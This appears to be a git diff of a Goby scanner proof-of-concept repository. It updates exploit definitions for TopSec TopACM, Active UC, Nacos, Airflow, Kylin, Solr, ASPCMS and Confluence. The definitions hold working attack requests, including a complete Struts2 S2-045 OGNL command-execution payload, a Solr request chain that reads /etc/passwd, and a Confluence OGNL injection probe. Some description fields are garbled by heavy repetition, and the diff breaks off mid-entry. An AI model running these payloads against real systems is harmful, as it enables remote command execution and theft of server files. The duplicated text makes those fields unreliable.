diff --git a/go/TopSec_TopACM_Remote_Command_Execution.go b/go/TopSec_TopACM_Remote_Command_Execution.go index 03960d9..ab95cac 100644 --- a/go/TopSec_TopACM_Remote_Command_Execution.go +++ b/go/TopSec_TopACM_Remote_Command_Execution.go @@ -1,77 +1,77 @@ -package exploits - -import ( - "git.gobies.org/goby/goscanner/goutils" - "git.gobies.org/goby/goscanner/jsonvul" - "git.gobies.org/goby/goscanner/scanconfig" - "git.gobies.org/goby/httpclient" - "net/url" - "strings" -) - -func init() { - expJson := `{"Name":"TopSec TopACM Remote Command Execution","Description":"
Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.
There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.
Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.
There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.
","Product":"TopSec-TopACM","Homepage":"https://www.topsec.com.cn/product/27.html","DisclosureDate":"2022-07-28","Author":"su18@javaweb.org","FofaQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","GobyQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","Level":"3","Impact":"There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.
At present, the manufacturer has not released a security patch. Please pay attention to the official update.https://www.topsec.com.cn/product/27.html
天融信上网行为管理系统(TopACM)综合考虑各行业客户需求,为客户提供安全策略、链路负载、身份认证、流量管理、行为管控、上网审计、日志追溯、网监对接、用户行为分析、VPN等实用功能。产品具有良好的网络适应性并满足《网络安全法》、公安部151号令、等保2.0等关于用户行为审计和日志留存的相关要求。目前产品广泛应用于政府、教育、能源、企业、运营商等各类行业,协助客户规范网络、提高工作效率、挖掘数据价值。
天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。
目前厂商还未发布安全补丁,请关注官方更新。https://www.topsec.com.cn/product/27.html
","Impact":"天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。
Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.
There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.
Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.
There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.
","Recommendation":"At present, the manufacturer has not released a security patch. Please pay attention to the official update.https://www.topsec.com.cn/product/27.html
There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.
Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.
There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.
Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.
There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.
","Product":"TopSec-TopACM","Homepage":"https://www.topsec.com.cn/product/27.html","DisclosureDate":"2022-07-28","Author":"su18@javaweb.org","FofaQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","GobyQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","Level":"3","Impact":"There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.
At present, the manufacturer has not released a security patch. Please pay attention to the official update.https://www.topsec.com.cn/product/27.html
天融信上网行为管理系统(TopACM)综合考虑各行业客户需求,为客户提供安全策略、链路负载、身份认证、流量管理、行为管控、上网审计、日志追溯、网监对接、用户行为分析、VPN等实用功能。产品具有良好的网络适应性并满足《网络安全法》、公安部151号令、等保2.0等关于用户行为审计和日志留存的相关要求。目前产品广泛应用于政府、教育、能源、企业、运营商等各类行业,协助客户规范网络、提高工作效率、挖掘数据价值。
天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。
目前厂商还未发布安全补丁,请关注官方更新。https://www.topsec.com.cn/product/27.html
","Impact":"天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。
Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.
There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.
Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.
There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.
","Recommendation":"At present, the manufacturer has not released a security patch. Please pay attention to the official update.https://www.topsec.com.cn/product/27.html
There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.
The attacker can get the server permission by injecting SQL into the upload Trojan
undefined
", + "References": [ + "http://wiki.peiqi.tech" + ], "ScanSteps": [ "AND", { @@ -25,7 +21,7 @@ "method": "GET", "uri": "/api/dbstat/gettablessize", "follow_redirect": false, - "header": null, + "header": {}, "data_type": "text", "data": "" }, @@ -66,43 +62,6 @@ "SetVariable": [] } ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/test.php", - "follow_redirect": true, - "header": null, - "data_type": "text", - "data": "", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "test", - "bz": "" - } - ] - }, - "SetVariable": [ - "output|lastbody|regex|" - ] - } - ], - "PostTime": "0000-00-00 00:00:00", - "GobyVersion": "0.0.0" + "PostTime": "2021-04-08 16:04:28", + "GobyVersion": "1.8.255" } \ No newline at end of file diff --git a/json/Active_UC_index.action_RCE.json b/json/Active_UC_index.action_RCE.json index 5e85e6a..496366f 100644 --- a/json/Active_UC_index.action_RCE.json +++ b/json/Active_UC_index.action_RCE.json @@ -1,29 +1,28 @@ { - "Name": "Active UC index.action RCE", + "Name": "Active UC index.action 远程命令执行漏洞", "Level": "3", "Tags": [ "RCE" ], "GobyQuery": "title=\"网动统一通信平台(Active UC)\"", - "Description": "", - "Product": "Active UC", - "Homepage": "http://www.iactive.com.cn/", - "Author": "", - "Impact": "Active UC index.action has a RCE vulnerability.", - "Recommendation": "update", - "References": [], - "HasExp": true, - "ExpParams": [ - { - "Name": "cmd", - "Type": "input", - "Value": "whoami" - } + "Description": "网动统一通信平台 Active UC index.action 存在S2-045远程命令执行漏洞, 通过漏洞可以执行任意命令", + "Product": "网动统一通信平台(Active UC)", + "Homepage": "https://gobies.org/", + "Author": "luckying", + "Impact": "", + "Recommandation": "", + "References": [ + "https://gobies.org/" ], - "ExpTips": { - "Type": "", - "Content": "" - }, + "HasExp": true, + "ExpParams": [ + { + "name": "Cmd", + "type": "input", + "value": "whoami", + "show": "" + } + ], "ScanSteps": [ "AND", { @@ -42,7 +41,7 @@ "Pragma": "no-cache" }, "data_type": "text", - "data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170" + "data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170" }, "ResponseTest": { "type": "group", @@ -60,7 +59,7 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { @@ -73,12 +72,12 @@ "Connection": "close", "Cookie": "SessionId=96F3F15432E0660E0654B1CE240C4C36", "Charsert": "UTF-8", - "Content-Type": "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170", + "Content-Type": "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{Cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170", "Cache-Control": "no-cache", "Pragma": "no-cache" }, "data_type": "text", - "data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170" + "data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170" }, "ResponseTest": { "type": "group", @@ -94,10 +93,10 @@ ] }, "SetVariable": [ - "output|lastbody|undefined|undefined" - ] + "output|lastbody" + ] } ], - "PostTime": "0000-00-00 00:00:00", - "GobyVersion": "0.0.0" + "PostTime": "2021-06-28 10:08:54", + "GobyVersion": "1.8.268" } \ No newline at end of file diff --git a/json/Alibaba_Nacos_Add_user_not_authorized.json b/json/Alibaba_Nacos_Add_user_not_authorized.json index c5933e8..e9a08ef 100644 --- a/json/Alibaba_Nacos_Add_user_not_authorized.json +++ b/json/Alibaba_Nacos_Add_user_not_authorized.json @@ -2,38 +2,39 @@ "Name": "Alibaba Nacos Add user not authorized", "Level": "2", "Tags": [ - "unauthorized" + "Ultra vires" ], - "GobyQuery": "title=\"Nacos\"", - "Description": "Alibaba Nacos is an easy-to-use platform designed for dynamic service discovery and configuration and service management. It helps you to build cloud native applications and microservices platform easily.", + "GobyQuery": "title==\"Nacos\"", + "Description": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.", "Product": "Alibaba Nacos", "Homepage": "https://github.com/alibaba/nacos", - "Author": "", - "Impact": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.", - "Recommendation": "update", - "References": [], - "HasExp": true, - "ExpParams": [ - { - "Name": "User", - "Type": "input", - "Value": "test" - }, - { - "Name": "Pass", - "Type": "input", - "Value": "test" - }, - { - "Name": "Dir", - "Type": "select", - "Value": "/v1/auth/users,/nacos/v1/auth/users" - } + "Author": "PeiQi", + "Impact": "Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.
Upgrade version
Log in to the background to view sensitive information
Upgrade version
", + "References": [ + "http://wiki.peiqi.tech" + ], "ScanSteps": [ "OR", { @@ -75,43 +71,6 @@ "SetVariable": [] } ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/test.php", - "follow_redirect": true, - "header": null, - "data_type": "text", - "data": "", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "test", - "bz": "" - } - ] - }, - "SetVariable": [ - "output|lastbody|regex|" - ] - } - ], - "PostTime": "0000-00-00 00:00:00", - "GobyVersion": "0.0.0" + "PostTime": "2021-04-04 18:56:41", + "GobyVersion": "1.8.255" } \ No newline at end of file diff --git a/json/Apache_Airflow_Unauthorized.json b/json/Apache_Airflow_Unauthorized.json index 23d8bc4..1cc21ae 100644 --- a/json/Apache_Airflow_Unauthorized.json +++ b/json/Apache_Airflow_Unauthorized.json @@ -1,18 +1,18 @@ { "Name": "Apache Airflow Unauthorized", - "Level": "2", + "Level": "3", "Tags": [ "Unauthorized" ], "GobyQuery": "app=\"APACHE-Airflow\"", - "Description": "Airflow is a platform created by the community to programmatically author, schedule and monitor workflows.", + "Description": "remote attacker to gain unauthorized access to a targeted system", "Product": "APACHE-Airflow", "Homepage": "https://airflow.apache.org/", - "Author": "", - "Impact": "Acunetix determined that it was possible to access Airflow Web interface without authentication. Airflow is designed to be accessed by trusted clients inside trusted environments. It's not recommended to have it publicly accessible.", - "Recommendation": "Restrict public access and upgrade to the latest version of Airflow.", + "Author": "aetkrad", + "Impact": "This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs
The attacker will log into the background as an administrator to further attack
", + "Recommandation": "undefined
", + "References": [ + "http://wiki.peiqi.tech" + ], "ScanSteps": [ "AND", { @@ -55,43 +51,6 @@ "SetVariable": [] } ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/test.php", - "follow_redirect": true, - "header": null, - "data_type": "text", - "data": "", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "test", - "bz": "" - } - ] - }, - "SetVariable": [ - "output|lastbody|regex|" - ] - } - ], - "PostTime": "0000-00-00 00:00:00", - "GobyVersion": "0.0.0" + "PostTime": "2021-04-04 15:51:21", + "GobyVersion": "1.8.255" } \ No newline at end of file diff --git a/json/Apache_Kylin_Unauthorized_configuration_disclosure.json b/json/Apache_Kylin_Unauthorized_configuration_disclosure.json index 452be2f..17526a7 100644 --- a/json/Apache_Kylin_Unauthorized_configuration_disclosure.json +++ b/json/Apache_Kylin_Unauthorized_configuration_disclosure.json @@ -1,31 +1,28 @@ { - "Name": "Apache Kylin API Unauthorized Access CVE-2020-13937", - "Level": "1", + "Name": "Apache Kylin Unauthorized configuration disclosure (CVE-2020-13937)", + "Level": "0", "Tags": [ - "unauthorized" + "Disclosure of Sensitive Information" ], "GobyQuery": "app=\"APACHE-kylin\"", - "Description": "Apache Kylin™ is an open source, distributed Analytical Data Warehouse for Big Data; it was designed to provide OLAP (Online Analytical Processing) capability in the big data era. By renovating the multi-dimensional cube and precalculation technology on Hadoop and Spark, Kylin is able to achieve near constant query speed regardless of the ever-growing data volume. Reducing query latency from minutes to sub-second, Kylin brings online analytics back to big data.", + "Description": "Apache kylin has a restful API that exposes configuration information without authorization.\nAttackers can use this vulnerability to obtain sensitive information of the system.", "Product": "Apache kylin", "Homepage": "http://kylin.apache.org/", - "Author": "", - "Impact": "Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin's configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone.", - "Recommendation": "update", + "Author": "PeiQi", + "Impact": "Attackers can use this vulnerability to obtain sensitive information of the system.
Upgrade to the safe version, or perform the following mitigation measures:
Edit \"$kylin\"_ HOME/WEB-INF/classes/ kylinSecurity.xml \";
Delete the following line \"< scr:intercept-url pattern= \"/api/admin/config\" access=\"permitAll\"/>\";
Restart the kylin instance to take effect.
", "References": [ - "https://nvd.nist.gov/vuln/detail/CVE-2020-13937" + "http://wiki.peiqi.tech" ], - "HasExp": true, - "ExpParams": [ - { - "Name": "Config", - "Type": "select", - "Value": "/kylin/api/admin/config" - } - ], - "ExpTips": { - "Type": "", - "Content": "" - }, + "HasExp": true, + "ExpParams": [ + { + "name": "Config", + "type": "select", + "value": "/kylin/api/admin/config", + "show": "" + } + ], "ScanSteps": [ "AND", { @@ -33,7 +30,7 @@ "method": "GET", "uri": "/kylin/api/admin/config", "follow_redirect": true, - "header": null, + "header": {}, "data_type": "text", "data": "" }, @@ -60,18 +57,18 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/kylin/api/admin/config", "follow_redirect": true, - "header": null, + "header": {}, "data_type": "text", "data": "" }, - "ResponseTest": { + "ResponseTest": { "type": "group", "operation": "AND", "checks": [ @@ -92,10 +89,10 @@ ] }, "SetVariable": [ - "output|lastbody|undefined|undefined" - ] + "output|lastbody" + ] } ], - "PostTime": "0000-00-00 00:00:00", - "GobyVersion": "0.0.0" + "PostTime": "2021-04-04 15:55:28", + "GobyVersion": "1.8.255" } \ No newline at end of file diff --git a/json/Apache_Solr_Arbitrary_File_Read.json b/json/Apache_Solr_Arbitrary_File_Read.json index 50f128e..e31407f 100644 --- a/json/Apache_Solr_Arbitrary_File_Read.json +++ b/json/Apache_Solr_Arbitrary_File_Read.json @@ -1,155 +1,155 @@ -{ - "Name": "Apache Solr Arbitrary File Read", - "Level": "2", - "Tags": ["fileread"], - "GobyQuery": "app=\"Solr\"", - "Description": "Apache Solr has an arbitrary file read vulnerability, which allows attackers to obtain sensitive files from the target server without authorization.", - "Product": "Apache Solr", - "Homepage": "https://solr.apache.org/", - "Author": "PeiQi", - "Impact": "Read any file on the server
", - "Recommandation": "undefined
", - "References": [ - "http://wiki.peiqi.tech" - ], - "HasExp": true, - "ExpParams": [ - { - "name": "file", - "type": "createSelect", - "value": "/etc/passwd,\\\\127.0.0.1\\c$\\Windows\\win.ini", - "show": "" - } - ], - "ExpTips": { - "Type": "", - "Content": "" - }, - "ScanSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/solr/admin/cores?indexInfo=false&wt=json", - "follow_redirect": true, - "header": {}, - "data_type": "text", - "data": "" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "responseHeader", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/solr/admin/cores?indexInfo=false&wt=json", - "follow_redirect": false, - "header": {}, - "data_type": "text", - "data": "" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "responseHeader", - "bz": "" - } - ] - }, - "SetVariable": [ - "output|lastbody|regex|(?s)\"name\":\"(.*?)\"," - ] - }, - { - "Request": { - "method": "POST", - "set_variable":["solrCore|lastbody|regex|(?s)\"name\":\"(.*?)\","], - "uri": "/solr/{{{solrCore}}}/config", - "follow_redirect": false, - "header": { - "Content-Type": "application/json" - }, - "data_type": "text", - "data": "{\"set-property\" : {\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - } - ] - }, - "SetVariable": [] - }, - { - "Request": { - "method": "POST", - "uri": "/solr/{{{solrCore}}}/debug/dump?param=ContentStreams", - "follow_redirect": false, - "header": { - "Content-Type": "application/x-www-form-urlencoded" - }, - "data_type": "text", - "data": "stream.url=file://{{{file}}}" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - } - ] - }, - "SetVariable": [ - "output|lastbody|regex|(?s)\"stream\":\"(.*)\"}]" - ] - } - ], - "PostTime": "2021-03-27 17:17:15", - "GobyVersion": "1.8.254" +{ + "Name": "Apache Solr Arbitrary File Read", + "Level": "2", + "Tags": ["fileread"], + "GobyQuery": "app=\"Solr\"", + "Description": "Apache Solr has an arbitrary file read vulnerability, which allows attackers to obtain sensitive files from the target server without authorization.", + "Product": "Apache Solr", + "Homepage": "https://solr.apache.org/", + "Author": "PeiQi", + "Impact": "Read any file on the server
", + "Recommandation": "undefined
", + "References": [ + "http://wiki.peiqi.tech" + ], + "HasExp": true, + "ExpParams": [ + { + "name": "file", + "type": "createSelect", + "value": "/etc/passwd,\\\\127.0.0.1\\c$\\Windows\\win.ini", + "show": "" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, + "ScanSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/solr/admin/cores?indexInfo=false&wt=json", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "responseHeader", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/solr/admin/cores?indexInfo=false&wt=json", + "follow_redirect": false, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "responseHeader", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|(?s)\"name\":\"(.*?)\"," + ] + }, + { + "Request": { + "method": "POST", + "set_variable":["solrCore|lastbody|regex|(?s)\"name\":\"(.*?)\","], + "uri": "/solr/{{{solrCore}}}/config", + "follow_redirect": false, + "header": { + "Content-Type": "application/json" + }, + "data_type": "text", + "data": "{\"set-property\" : {\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/solr/{{{solrCore}}}/debug/dump?param=ContentStreams", + "follow_redirect": false, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "stream.url=file://{{{file}}}" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|(?s)\"stream\":\"(.*)\"}]" + ] + } + ], + "PostTime": "2021-03-27 17:17:15", + "GobyVersion": "1.8.254" } \ No newline at end of file diff --git a/json/Aspcms_Backend_Leak.json b/json/Aspcms_Backend_Leak.json index 9a05735..33d3b2c 100644 --- a/json/Aspcms_Backend_Leak.json +++ b/json/Aspcms_Backend_Leak.json @@ -5,11 +5,11 @@ "infoleak" ], "GobyQuery": "app=\"ASPCMS\"", - "Description": "aspCMS is a module based ASP Content Management System (CMS).", + "Description": "aspcms /plug/oem/AspCms_OEMFun.asp leak backend url", "Product": "ASPCMS", - "Homepage": "", - "Author": "", - "Impact": "aspcms /plug/oem/AspCms_OEMFun.asp leak backend url.", + "Homepage": "https://gobies.org/", + "Author": "aetkrad", + "Impact": "leak backend url
An OGNL injection vulnerability exists that would allow an authenticated user, and in some instances unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.
General repair suggestions:
Check and upgrade to the secure version based on the information in the affected version. The official download link is :https://www.atlassian.com/software/confluence/download-archives
Temporary repair suggestions:
If you are not ready to update the Confluence, please refer to the official notification calling for Mitigation for Linux and Windows operating systems.:https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
", "References": [ - "https://nvd.nist.gov/vuln/detail/CVE-2021-26084", - "https://jira.atlassian.com/browse/CONFSERVER-67940", - "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html" + "https://github.com/alt3kx/CVE-2021-26084_PoC" ], "HasExp": true, "ExpParams": [ { - "Name": "Command", + "Name": "command", "Type": "input", "Value": "whoami" - }, - { - "Name": "Path", - "Type": "select", - "Value": "/pages/createpage-entervariables.action?SpaceKey=x,/pages/createpage-entervariables.action,/confluence/pages/createpage-entervariables.action?SpaceKey=x,/confluence/pages/createpage-entervariables.action,/wiki/pages/createpage-entervariables.action?SpaceKey=x,/wiki/pages/createpage-entervariables.action,/pages/doenterpagevariables.action,/pages/createpage.action?spaceKey=myproj,/pages/templates2/viewpagetemplate.action,/pages/createpage-entervariables.action,/template/custom/content-editor,/templates/editor-preload-container,/users/user-dark-features" } ], "ExpTips": { @@ -34,7 +27,7 @@ "Content": "" }, "ScanSteps": [ - "OR", + "AND", { "Request": { "method": "POST", @@ -44,8 +37,12 @@ "Content-Type": "application/x-www-form-urlencoded" }, "data_type": "text", - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", - "set_variable": [] + "data": "queryString=aaaaaaaa%5Cu0027%2B%7B{{{r1}}}%2B{{{r2}}}%7D%2B%5Cu0027", + "set_variable": [ + "r1|rand|int|8", + "r2|rand|int|7", + "r4|r1|add|r2" + ] }, "ResponseTest": { "type": "group", @@ -62,420 +59,14 @@ "type": "item", "variable": "$body", "operation": "contains", - "value": "value=\"aaaa{140592=null}", + "value": "{{{r4}}}", "bz": "" } ] }, - "SetVariable": [] - }, - { - "Request": { - "method": "POST", - "uri": "/pages/createpage-entervariables.action", - "follow_redirect": true, - "header": { - "Content-Type": "application/x-www-form-urlencoded" - }, - "data_type": "text", - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": 